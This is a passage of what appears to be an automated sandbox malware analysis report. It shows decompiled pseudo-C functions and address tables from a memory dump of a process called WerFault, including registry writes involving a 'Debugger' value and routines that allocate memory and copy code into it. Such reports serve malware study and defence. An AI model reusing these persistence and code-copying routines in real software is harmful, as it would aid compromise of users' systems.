                        0x0286d3b8
                        0x0286d3c0
                        0x0286d3ce
                        0x0286d3d3
                        0x0286d3d7
                        0x0286d3e3
                        0x0286d3f5
                        0x0286d400
                        0x0286d40c
                        0x0286d41b
                        0x0286d421
                        0x0286d42b
                        0x0286d435
                        0x0286d43f
                        0x0286d449
                        0x0286d453
                        0x0286d45d
                        0x0286d467
                        0x0286d46a
                        0x0286d472
                        0x0286d479
                        0x0286d485
                        0x0286d48a
                        0x0286d491
                        0x0286d4af
                        0x00000000
                        0x0286d4b4
                        0x0286d497
                        0x0286d4a0
                        0x00000000
                        0x0286d4a6
                        0x00000000
                        0x0286d47b
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 98e1c01d1a1289f259da731c4ad1a45e1b89c785e3293df1431a42ec3d1411bf
                        • Instruction ID: 0a5d38431e8790b3789a8c1ced6e55c4b578e03a889aa8edb6a8edfa203f190f
                        • Opcode Fuzzy Hash: 98e1c01d1a1289f259da731c4ad1a45e1b89c785e3293df1431a42ec3d1411bf
                        • Instruction Fuzzy Hash: 6531A57CE00208EFCB04DF94D588AADBBB1FB18315F14849AD915EB792C775AA45CF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02862722 Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E02862722(void* __ecx, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _t15;
				long _t18;
				void* _t21;
				int _t24;

				_push(__ecx);
				_t24 = 0;
				_v8 = 0;
				if(_a16 == 0 || _a8 == 0 || E028619E8(_a8) == 0) {
					L7:
					_t15 = 0;
				} else {
					_t18 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, 0x102, 0,  &_v8, 0); // executed
					if(_t18 != 0) {
						goto L7;
					} else {
						_t21 = L02887821(_v8, _a12, 0, 1, _a16, E028619E8(_a16) + _t19 + 2); // executed
						if(_t21 == 0) {
							_t24 = 1;
						}
						RegCloseKey(_v8); // executed
						_t15 = _t24;
					}
				}
				return _t15;
			}








                        0x02862725
                        0x02862727
                        0x02862729
                        0x0286272f
                        0x02862791
                        0x02862791
                        0x02862742
                        0x02862756
                        0x0286275e
                        0x00000000
                        0x02862760
                        0x02862779
                        0x02862780
                        0x02862782
                        0x02862782
                        0x02862787
                        0x0286278d
                        0x0286278d
                        0x0286275e
                        0x02862795

                        APIs
                        • RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000102,00000000,?,00000000,00000002,?,?,0287204E,80000002,?,Debugger), ref: 02862756
                        • RegCloseKey.KERNEL32(?,?,?,0287204E,80000002,?,Debugger,?), ref: 02862787
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreate
                        • String ID:
                        • API String ID: 2932200918-0
                        • Opcode ID: bf98b1266b179bf9c76af25e6d5ca6518c362f823e37d0ddd3857b80ed8ad721
                        • Instruction ID: adcb4d1af6d201f92462cccaf1dfff377dd87b0d5595f89b97f50c2bee93b513
                        • Opcode Fuzzy Hash: bf98b1266b179bf9c76af25e6d5ca6518c362f823e37d0ddd3857b80ed8ad721
                        • Instruction Fuzzy Hash: 9501167DA00209BFDF149F90DD8ADBA77AEAB00349B148469BD09D6151D7718E20EB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02862802 Relevance: 3.0, APIs: 2, Instructions: 42registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 29%
                        			E02862802(int __eax, intOrPtr _a4, intOrPtr _a8, char* _a12, char* _a16) {
				int* _v8;
				int _v12;
				int _v16;

				_v8 = 0;
				_v16 = 1;
				_v12 = __eax;
				if(_a8 == 0 || E028619D6(_a8) == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_push( &_v8);
					_push(0x101);
					_push(0);
					_push(_a8);
					_push(_a4);
					if( *0x289fae0() != 0) {
						goto L5;
					}
					RegQueryValueExA(_v8, _a12, 0,  &_v16, _a16,  &_v12); // executed
					RegCloseKey(_v8); // executed
					return _v12;
				}
			}






                        0x0286280b
                        0x0286280e
                        0x02862815
                        0x0286281b
                        0x0286286e
                        0x00000000
                        0x0286282e
                        0x02862831
                        0x02862832
                        0x02862837
                        0x02862838
                        0x0286283b
                        0x02862846
                        0x00000000
                        0x00000000
                        0x0286285a
                        0x02862863
                        0x00000000
                        0x02862869

                        APIs
                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000001,?,?), ref: 0286285A
                        • RegCloseKey.KERNEL32(?), ref: 02862863
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseQueryValue
                        • String ID:
                        • API String ID: 3356406503-0
                        • Opcode ID: cfff94d792c7d4e3cbffb31639221d3b25b752c74573ab8774bb3c65b141d115
                        • Instruction ID: aa38999e0c6153e466e57e00a20f8f7eecf235a3a4639068c4102b1ffc4ab88c
                        • Opcode Fuzzy Hash: cfff94d792c7d4e3cbffb31639221d3b25b752c74573ab8774bb3c65b141d115
                        • Instruction Fuzzy Hash: C601C079A00119FBDF11DFA2DD48DEEBBB9EF04704F0080A6B915E61A4D7719A60DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881AAA Relevance: 3.0, APIs: 2, Instructions: 481COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E02881AAA(void* __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v38;
				intOrPtr _v42;
				intOrPtr _v46;
				intOrPtr _v50;
				char _v52;
				intOrPtr* _v56;
				signed int _v62;
				signed int _v66;
				intOrPtr _v70;
				intOrPtr _v74;
				intOrPtr _v78;
				signed int _v82;
				signed int _v86;
				signed int _v90;
				signed int _v94;
				signed int _v98;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				signed int _v132;
				signed int _v136;
				char _v660;
				signed int _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				signed int _v676;
				signed int _v680;
				signed int _v688;
				signed int _v692;
				signed int _v693;
				signed int _v694;
				signed int _v695;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t255;
				void* _t267;
				void* _t270;
				signed int _t271;
				void* _t289;
				short _t297;
				signed char _t300;
				short _t315;
				signed char _t327;
				signed int _t336;
				signed int _t348;
				signed int _t363;
				signed int _t373;
				void* _t381;
				signed int _t382;
				signed char _t387;
				signed int _t389;
				signed char _t392;
				signed int _t399;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				void* _t429;
				void* _t432;
				void* _t433;

				_t429 = __edx;
				if(_a4 != 0 || _a12 == 0) {
					L4:
					__eflags = _a12;
					if(_a12 != 0) {
						_t407 = _a12;
						__eflags =  *_t407;
						if( *_t407 != 0) {
							goto L7;
						} else {
							return _t407 | 0xffffffff;
						}
					}
					L7:
					_t255 =  *0x289f2e8;
					__eflags =  *(_t255 + 0x12e);
					if( *(_t255 + 0x12e) != 0) {
						_v128 =  *0x289f66c;
						_v132 = _v132 & 0x00000000;
						_t416 =  *((intOrPtr*)( *0x289f2e8 + 0x122));
						_v124 =  *((intOrPtr*)( *0x289f2e8 + 0x1a)) +  *((intOrPtr*)( *0x289f2e8 + 0x122)) + 0x3cc8;
						_v112 = 0x478;
						_v120 = _v120 & 0x00000000;
						_v680 = _v680 & 0x00000000;
						_v32 = _v32 & 0x00000000;
						_v116 = _v116 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						__eflags = _a16;
						if(_a16 == 0) {
							_t405 = _v112 | 0x00000002;
							__eflags = _t405;
							_v112 = _t405;
						}
						E02861807( &_v660, 0x208);
						E02861807( &_v52, 0x12);
						E02861807( &_v100, 0x2a);
						__eflags = _a12;
						if(_a12 == 0) {
							L13:
							_v680 = E02863E38(_t416, _a4, _v112);
							goto L16;
						} else {
							__eflags =  *_a12;
							if( *_a12 != 0) {
								__eflags = _a12;
								if(_a12 != 0) {
									_v680 =  *_a12;
									_a4 =  *0x289f704(_v680);
									_v132 = 1;
								}
								L16:
								__eflags = _v680;
								if(_v680 == 0) {
									L18:
									_t267 = 0xfffffffe;
									return _t267;
								}
								__eflags = _a4;
								if(_a4 != 0) {
									__eflags = _a4 -  *0x289fdb4;
									if(_a4 !=  *0x289fdb4) {
										_v32 = E02863207(_a4);
										__eflags = _v32;
										if(__eflags != 0) {
											_t270 = E02864C5D(_t416, __eflags, _v680); // executed
											__eflags = _t270 - 1;
											if(_t270 != 1) {
												_t271 = E028644A2(_t416, _v680); // executed
												__eflags = _t271;
												if(_t271 != 0) {
													__eflags = _a16 - 7;
													if(_a16 == 7) {
														L31:
														__eflags = _a16 - 6;
														if(_a16 == 6) {
															L47:
															_v116 = E0286161B(0x2672);
															__eflags = _v116;
															if(_v116 != 0) {
																_v108 = E02880FB5( *((intOrPtr*)( *0x289f2e8 + 0x1e)));
																_v136 =  *((intOrPtr*)( *0x289f2e8 + 0x1a));
																_v676 = E0288489C -  *((intOrPtr*)( *0x289f2e8 + 0x1e));
																_v16 = _v136 + 4;
																_v668 = _v16 + 0x2676;
																_t419 = _v668;
																_v28 = _v668 +  *((intOrPtr*)( *0x289f2e8 + 0x122)) + 4;
																_v672 = _v28 + 0xd5a;
																_v24 = _v24 & 0x00000000;
																__eflags = _v108;
																if(_v108 != 0) {
																	__eflags = _v676;
																	if(_v676 == 0) {
																		L53:
																		L100:
																		E02880F3D( &_v52, _v680);
																		__eflags = _v20;
																		if(_v20 != 0) {
																			VirtualFree(_v20, 0, 0x8000); // executed
																		}
																		__eflags = _v32;
																		if(_v32 != 0) {
																			 *0x289f824(_v32);
																		}
																		__eflags = _v680;
																		if(_v680 != 0) {
																			__eflags = _v132;
																			if(_v132 == 0) {
																				 *0x289f824(_v680);
																			}
																		}
																		__eflags = _v116;
																		if(_v116 != 0) {
																			E028617E4(_v116);
																		}
																		_t289 = 0xfffffff9;
																		return _t289;
																	}
																	__eflags = _v136;
																	if(_v136 != 0) {
																		_v20 =  *0x289f6c8(0, _v136, 0x3000, 4);
																		__eflags = _v20;
																		if(_v20 != 0) {
																			_v24 = _v20 + _v676;
																			_t297 = 0x12;
																			_v52 = _t297;
																			_v46 = _v124;
																			_t300 = E02880D68(_v680,  &_v52); // executed
																			__eflags = _t300 & 0x000000ff;
																			if((_t300 & 0x000000ff) != 0) {
																				__eflags = _v28 - 6;
																				if(_v28 < 6) {
																					L62:
																					goto L100;
																				}
																				__eflags = _v16 - 6;
																				if(_v16 < 6) {
																					goto L62;
																				}
																				__eflags = _v668 - 6;
																				if(_v668 < 6) {
																					goto L62;
																				}
																				__eflags = _v672 - 6;
																				if(_v672 >= 6) {
																					E02861493(_t419, _v20,  *((intOrPtr*)( *0x289f2e8 + 0x1e)), _v136);
																					_push(0x40);
																					_t432 = 5;
																					_v664 = E028615A2(0x2895380, _t419, _v24, _t432);
																					_t123 = _v664 + 6; // 0x6
																					_v56 = _v24 + _t123;
																					__eflags = _v664;
																					if(_v664 >= 0) {
																						 *_v56 = _v38 + _v16;
																						_t422 = _v108;
																						_t411 = _v20;
																						_v12 = E02884D95(_v38, _v20,  *((intOrPtr*)( *0x289f2e8 + 0x1e)) -  *((intOrPtr*)(_v108 + 0x34)));
																						__eflags = _v12 - 0x100;
																						if(_v12 >= 0x100) {
																							_t315 = 0x2a;
																							_v100 = _t315;
																							_v98 = _v98 & 0x00000000;
																							_v90 = _a16;
																							_v94 = _a4;
																							_v62 = _v32;
																							_v82 = _v116;
																							_v66 = _a8;
																							_v86 = _v136;
																							_v78 = _v38;
																							_v74 = _v38 + _v668;
																							_v70 = _v38 + _v28;
																							_t327 = E0288058A(_t411, _t422,  &_v100, _v680); // executed
																							__eflags = _t327 & 0x000000ff;
																							if((_t327 & 0x000000ff) != 0) {
																								E02861493(_t422, _v42 + _v16, _v116, 0x2672);
																								E02861493(_t422, _v42 + _v28,  *((intOrPtr*)( *0x289f2e8 + 0x12e)), 0xd56);
																								_t336 =  *0x289f2e8;
																								__eflags =  *(_t336 + 0x11e);
																								if( *(_t336 + 0x11e) != 0) {
																									_t373 =  *0x289f2e8;
																									__eflags =  *(_t373 + 0x122);
																									if( *(_t373 + 0x122) != 0) {
																										E02889FCE();
																										__eflags = _v42 + _v668;
																										E02861493(_t422, _v42 + _v668,  *((intOrPtr*)( *0x289f2e8 + 0x11e)),  *((intOrPtr*)( *0x289f2e8 + 0x122)));
																										E02889FDA();
																									}
																								}
																								E02861493(_t422, _v42, _v20, _v136);
																								_v104 = _v104 & 0x00000000;
																								_v8 = _v38 + _v676;
																								__eflags = (_a20 & 0x000000ff) - 1;
																								if((_a20 & 0x000000ff) != 1) {
																									L82:
																									__eflags = _a24;
																									if(_a24 == 0) {
																										L85:
																										_v694 = 1;
																										L86:
																										__eflags = _v694 & 0x000000ff;
																										if((_v694 & 0x000000ff) == 0) {
																											 *(_a24 + 2) =  *(_a24 + 2) & 0x00000000;
																											 *((intOrPtr*)(_a24 + 6)) = _v38;
																											 *((intOrPtr*)(_a24 + 0xa)) = _v42;
																											 *((intOrPtr*)(_a24 + 0xe)) = _v8;
																											 *(_a24 + 0x1a) = _v136;
																											 *((intOrPtr*)(_a24 + 0x12)) = _v42 + _v672;
																											 *((intOrPtr*)(_a24 + 0x16)) = _v38 + _v672;
																											_t363 = _a24;
																											_t227 = _t363 + 0x1e;
																											 *_t227 =  *(_t363 + 0x1e) & 0x00000000;
																											__eflags =  *_t227;
																										}
																										VirtualFree(_v20, 0, 0x8000); // executed
																										__eflags = _v680;
																										if(_v680 != 0) {
																											__eflags = _v132;
																											if(_v132 == 0) {
																												 *0x289f824(_v680);
																											}
																										}
																										__eflags = _a8;
																										if(_a8 == 0) {
																											L94:
																											_v695 = 1;
																											goto L95;
																										} else {
																											__eflags = ( *_a8 & 0x0000ffff) - 0xe;
																											if(( *_a8 & 0x0000ffff) != 0xe) {
																												goto L94;
																											}
																											_v695 = 0;
																											L95:
																											__eflags = (_v695 & 0x000000ff) - 1;
																											if((_v695 & 0x000000ff) == 1) {
																												L98:
																												E02880F88( &_v52);
																												L99:
																												 *0x289f824(_v50);
																												E028617E4(_v116); // executed
																												return 0;
																											}
																											__eflags = _a8;
																											if(_a8 == 0) {
																												goto L99;
																											}
																											_t348 = _a8;
																											__eflags =  *(_t348 + 6) & 0x00000001;
																											if(( *(_t348 + 6) & 0x00000001) != 0) {
																												goto L99;
																											}
																											goto L98;
																										}
																									}
																									__eflags = ( *_a24 & 0x0000ffff) - 0x22;
																									if(( *_a24 & 0x0000ffff) != 0x22) {
																										goto L85;
																									}
																									_v694 = 0;
																									goto L86;
																								} else {
																									__eflags = _a16;
																									if(_a16 != 0) {
																										__eflags = _a16 - 4;
																										if(_a16 != 4) {
																											__eflags = _a16 - 7;
																											if(_a16 != 7) {
																												L81:
																												__eflags = _v38 + _v672;
																												E02880778(_v128, _t422, _v680, _v8, _v38 + _v672); // executed
																												goto L82;
																											}
																											__eflags = _a8;
																											if(_a8 != 0) {
																												__eflags = _v38 + _v672;
																												E028808D0( *0x289f600, _t422, _t432, _v680, _v8, _v38 + _v672);
																											}
																											goto L82;
																										}
																										goto L81;
																									}
																									_v104 = E02865D37(_v680, _v8, 0, 0, 0);
																									goto L82;
																								}
																							}
																							goto L100;
																						}
																						goto L100;
																					}
																					goto L100;
																				}
																				goto L62;
																			}
																			goto L100;
																		}
																		goto L100;
																	}
																	goto L53;
																}
																goto L100;
															}
															goto L100;
														}
														_t381 = E02864CD0(_v680); // executed
														__eflags = _t381 - 1;
														if(_t381 == 1) {
															_v128 =  *0x289f57c;
														}
														_t382 = E02864E69( &_v660, _t416, _t433, _v680); // executed
														__eflags = _t382;
														if(_t382 == 0) {
															goto L47;
														} else {
															_v688 =  *0x289fc64( &_v660);
															_v692 = _v692 & 0x00000000;
															__eflags = _a8;
															if(_a8 == 0) {
																L38:
																_v693 = 1;
																L39:
																__eflags = _v693 & 0x000000ff;
																if((_v693 & 0x000000ff) == 0) {
																	_v692 =  *((intOrPtr*)(_a8 + 0xa));
																}
																__eflags = _v688;
																if(_v688 == 0) {
																	goto L47;
																} else {
																	_t387 = E0287FF99(_t429, _v692,  &_v660);
																	__eflags = (_t387 & 0x000000ff) - 1;
																	if((_t387 & 0x000000ff) != 1) {
																		_t389 =  *0x289f2e8;
																		__eflags =  *(_t389 + 0x16) & 0x00000200;
																		if(( *(_t389 + 0x16) & 0x00000200) == 0) {
																			goto L47;
																		}
																		_t392 = E0287FD85(_v688);
																		__eflags = _t392 & 0x000000ff;
																		if((_t392 & 0x000000ff) != 0) {
																			goto L47;
																		}
																		goto L100;
																	}
																	goto L100;
																}
															}
															__eflags = ( *_a8 & 0x0000ffff) - 0xe;
															if(( *_a8 & 0x0000ffff) != 0xe) {
																goto L38;
															}
															_v693 = 0;
															goto L39;
														}
													}
													__eflags = _a16 - 6;
													if(_a16 == 6) {
														goto L31;
													}
													_t399 = E028644F0(_v680); // executed
													__eflags = _t399;
													if(_t399 != 0) {
														goto L31;
													}
													goto L100;
												}
												goto L100;
											}
											goto L100;
										}
										goto L100;
									}
									goto L100;
								}
								goto L18;
							}
							goto L13;
						}
					} else {
						return _t255 | 0xffffffff;
					}
				} else {
					_t409 = _a12;
					if( *_t409 != 0) {
						goto L4;
					} else {
						return _t409 | 0xffffffff;
					}
				}
			}











































































                        0x02881aaa
                        0x02881aba
                        0x02881ad2
                        0x02881ad2
                        0x02881ad6
                        0x02881ad8
                        0x02881adb
                        0x02881ade
                        0x00000000
                        0x02881ae0
                        0x00000000
                        0x02881ae0
                        0x02881ade
                        0x02881ae8
                        0x02881ae8
                        0x02881aed
                        0x02881af4
                        0x02881b03
                        0x02881b06
                        0x02881b18
                        0x02881b25
                        0x02881b28
                        0x02881b2f
                        0x02881b33
                        0x02881b3a
                        0x02881b3e
                        0x02881b42
                        0x02881b46
                        0x02881b4a
                        0x02881b4f
                        0x02881b4f
                        0x02881b52
                        0x02881b52
                        0x02881b61
                        0x02881b6c
                        0x02881b77
                        0x02881b7c
                        0x02881b80
                        0x02881b8a
                        0x02881b95
                        0x00000000
                        0x02881b82
                        0x02881b85
                        0x02881b88
                        0x02881b9d
                        0x02881ba1
                        0x02881ba8
                        0x02881bba
                        0x02881bbd
                        0x02881bbd
                        0x02881bc4
                        0x02881bc4
                        0x02881bcb
                        0x02881bd3
                        0x02881bd5
                        0x00000000
                        0x02881bd5
                        0x02881bcd
                        0x02881bd1
                        0x02881bde
                        0x02881be4
                        0x02881bf8
                        0x02881bfb
                        0x02881bff
                        0x02881c11
                        0x02881c16
                        0x02881c19
                        0x02881c2b
                        0x02881c30
                        0x02881c32
                        0x02881c3e
                        0x02881c42
                        0x02881c63
                        0x02881c63
                        0x02881c67
                        0x02881d48
                        0x02881d52
                        0x02881d55
                        0x02881d59
                        0x02881d72
                        0x02881d7d
                        0x02881d90
                        0x02881d9f
                        0x02881daa
                        0x02881dbb
                        0x02881dc5
                        0x02881dd0
                        0x02881dd6
                        0x02881dda
                        0x02881dde
                        0x02881dea
                        0x02881df1
                        0x02881dfc
                        0x028821a3
                        0x028821ac
                        0x028821b1
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821c7
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821d6
                        0x028821dd
                        0x028821df
                        0x028821e3
                        0x028821eb
                        0x028821eb
                        0x028821e3
                        0x028821f1
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x00000000
                        0x02882201
                        0x02881df3
                        0x02881dfa
                        0x02881e1b
                        0x02881e1e
                        0x02881e22
                        0x02881e37
                        0x02881e3c
                        0x02881e3d
                        0x02881e44
                        0x02881e51
                        0x02881e59
                        0x02881e5b
                        0x02881e67
                        0x02881e6b
                        0x02881e85
                        0x00000000
                        0x02881e85
                        0x02881e6d
                        0x02881e71
                        0x00000000
                        0x00000000
                        0x02881e73
                        0x02881e7a
                        0x00000000
                        0x00000000
                        0x02881e7c
                        0x02881e83
                        0x02881ea0
                        0x02881ea5
                        0x02881ea9
                        0x02881eb7
                        0x02881ec6
                        0x02881eca
                        0x02881ecd
                        0x02881ed4
                        0x02881ee9
                        0x02881ef0
                        0x02881efd
                        0x02881f05
                        0x02881f08
                        0x02881f0f
                        0x02881f1d
                        0x02881f1e
                        0x02881f22
                        0x02881f29
                        0x02881f2f
                        0x02881f35
                        0x02881f3b
                        0x02881f41
                        0x02881f4a
                        0x02881f50
                        0x02881f5c
                        0x02881f65
                        0x02881f71
                        0x02881f79
                        0x02881f7b
                        0x02881f96
                        0x02881fb2
                        0x02881fb7
                        0x02881fbc
                        0x02881fc3
                        0x02881fc5
                        0x02881fca
                        0x02881fd1
                        0x02881fd3
                        0x02881ff1
                        0x02881ff8
                        0x02881ffd
                        0x02881ffd
                        0x02881fd1
                        0x0288200e
                        0x02882013
                        0x02882020
                        0x02882027
                        0x0288202a
                        0x0288209e
                        0x0288209e
                        0x028820a2
                        0x028820b8
                        0x028820b8
                        0x028820bf
                        0x028820c6
                        0x028820c8
                        0x028820cd
                        0x028820d7
                        0x028820e0
                        0x028820e9
                        0x028820f5
                        0x02882104
                        0x02882113
                        0x02882116
                        0x02882119
                        0x02882119
                        0x02882119
                        0x02882119
                        0x02882127
                        0x0288212d
                        0x02882134
                        0x02882136
                        0x0288213a
                        0x02882142
                        0x02882142
                        0x0288213a
                        0x02882148
                        0x0288214c
                        0x02882162
                        0x02882162
                        0x00000000
                        0x0288214e
                        0x02882154
                        0x02882157
                        0x00000000
                        0x00000000
                        0x02882159
                        0x02882169
                        0x02882170
                        0x02882173
                        0x02882186
                        0x02882189
                        0x0288218e
                        0x02882191
                        0x0288219a
                        0x00000000
                        0x0288219f
                        0x02882175
                        0x02882179
                        0x00000000
                        0x00000000
                        0x0288217b
                        0x02882181
                        0x02882184
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02882184
                        0x0288214c
                        0x028820aa
                        0x028820ad
                        0x00000000
                        0x00000000
                        0x028820af
                        0x00000000
                        0x0288202c
                        0x0288202c
                        0x02882030
                        0x0288204b
                        0x0288204f
                        0x02882057
                        0x0288205b
                        0x02882083
                        0x02882086
                        0x02882099
                        0x00000000
                        0x02882099
                        0x0288205d
                        0x02882061
                        0x02882066
                        0x0288207c
                        0x0288207c
                        0x00000000
                        0x02882081
                        0x00000000
                        0x02882051
                        0x02882046
                        0x00000000
                        0x02882046
                        0x0288202a
                        0x00000000
                        0x02881f7d
                        0x00000000
                        0x02881f11
                        0x00000000
                        0x02881ed6
                        0x00000000
                        0x02881e83
                        0x00000000
                        0x02881e5d
                        0x00000000
                        0x02881e24
                        0x00000000
                        0x02881dfa
                        0x00000000
                        0x02881de0
                        0x00000000
                        0x02881d5b
                        0x02881c73
                        0x02881c78
                        0x02881c7b
                        0x02881c82
                        0x02881c82
                        0x02881c91
                        0x02881c96
                        0x02881c98
                        0x00000000
                        0x02881c9e
                        0x02881cab
                        0x02881cb1
                        0x02881cb8
                        0x02881cbc
                        0x02881cd2
                        0x02881cd2
                        0x02881cd9
                        0x02881ce0
                        0x02881ce2
                        0x02881cea
                        0x02881cea
                        0x02881cf0
                        0x02881cf7
                        0x00000000
                        0x02881cf9
                        0x02881d06
                        0x02881d0e
                        0x02881d11
                        0x02881d1d
                        0x02881d25
                        0x02881d2a
                        0x00000000
                        0x00000000
                        0x02881d32
                        0x02881d3a
                        0x02881d3c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02881d3e
                        0x00000000
                        0x02881d13
                        0x02881cf7
                        0x02881cc4
                        0x02881cc7
                        0x00000000
                        0x00000000
                        0x02881cc9
                        0x00000000
                        0x02881cc9
                        0x02881c98
                        0x02881c44
                        0x02881c48
                        0x00000000
                        0x00000000
                        0x02881c50
                        0x02881c55
                        0x02881c57
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02881c59
                        0x00000000
                        0x02881c34
                        0x00000000
                        0x02881c1b
                        0x00000000
                        0x02881c01
                        0x00000000
                        0x02881be6
                        0x00000000
                        0x02881bd1
                        0x00000000
                        0x02881b88
                        0x02881af6
                        0x00000000
                        0x02881af6
                        0x02881ac2
                        0x02881ac2
                        0x02881ac8
                        0x00000000
                        0x02881aca
                        0x00000000
                        0x02881aca
                        0x02881ac8

                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e478a4d6b5d9ac9fe1e7a29aeec9e46687aea29756e1cafb82b92c148b26d933
                        • Instruction ID: 1321123b0467752d1a3650f4213be46158728b1dd47db90c65cd50b72755d941
                        • Opcode Fuzzy Hash: e478a4d6b5d9ac9fe1e7a29aeec9e46687aea29756e1cafb82b92c148b26d933
                        • Instruction Fuzzy Hash: 5232163CA00219DFDF24EF98C888BADB7B1BF05319F144496E909EB291D774AA95CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288A45C Relevance: 1.7, APIs: 1, Instructions: 244fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,000009C4), ref: 0288A575
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: e449adafda609149068734129c4a327589e17ab6fc8386656d9902800a71bf48
                        • Instruction ID: 9cde5dedfdf7952988706096af65f40bd6113f1ab61ef6912f7d14ec27adf2ce
                        • Opcode Fuzzy Hash: e449adafda609149068734129c4a327589e17ab6fc8386656d9902800a71bf48
                        • Instruction Fuzzy Hash: 0B91187DD40204ABDB2CAFA4DC8CBE933B5EB15319F284962E655E36D1C73588A1CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288524A Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                        Download Yara Rule
                        C-Code - Quality: 33%
                        			E0288524A(char* __eax, void* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				short _v38;
				char _v40;
				char _v56;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t55;
				char _t67;
				short _t80;
				intOrPtr* _t85;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				char* _t95;
				intOrPtr _t96;

				_t95 = __eax;
				 *0x289f880(0);
				if(__eax == 0 || _a4 == 0) {
					L31:
					return 0;
				} else {
					_t88 = __eax;
					if(E028619D6(__eax) == 0) {
						goto L31;
					}
					_t46 =  *0x289fd84(_t95);
					_v20 = _t46;
					if(_t46 == 0 || _t46 == 0xffffffff) {
						_v12 = 0;
						_t48 =  *0x289fd7c(_t95, 0, 0,  &_v24); // executed
						if(_t48 == 0) {
							_t96 = _v24;
							_t49 = _t96;
							if(_t96 == 0) {
								L14:
								_v8 = E0286161B(_v12 * 0x11);
								_t55 = E0286161B(_v12 << 2);
								_t92 = _t55;
								_v20 = _t92;
								if(_v8 == 0) {
									L23:
									if(_t92 != 0) {
										E028617E4(_t92);
									}
									 *_a4 = 0;
									 *0x289fd80(_t96);
									if(_t92 != 0) {
										E028617E4(_t92);
									}
									if(_v8 != 0) {
										E028617E4(_v8);
									}
									_push(0);
									L30:
									 *0x289f880();
									goto L31;
								}
								if(_t92 == 0) {
									E028617E4(_v8);
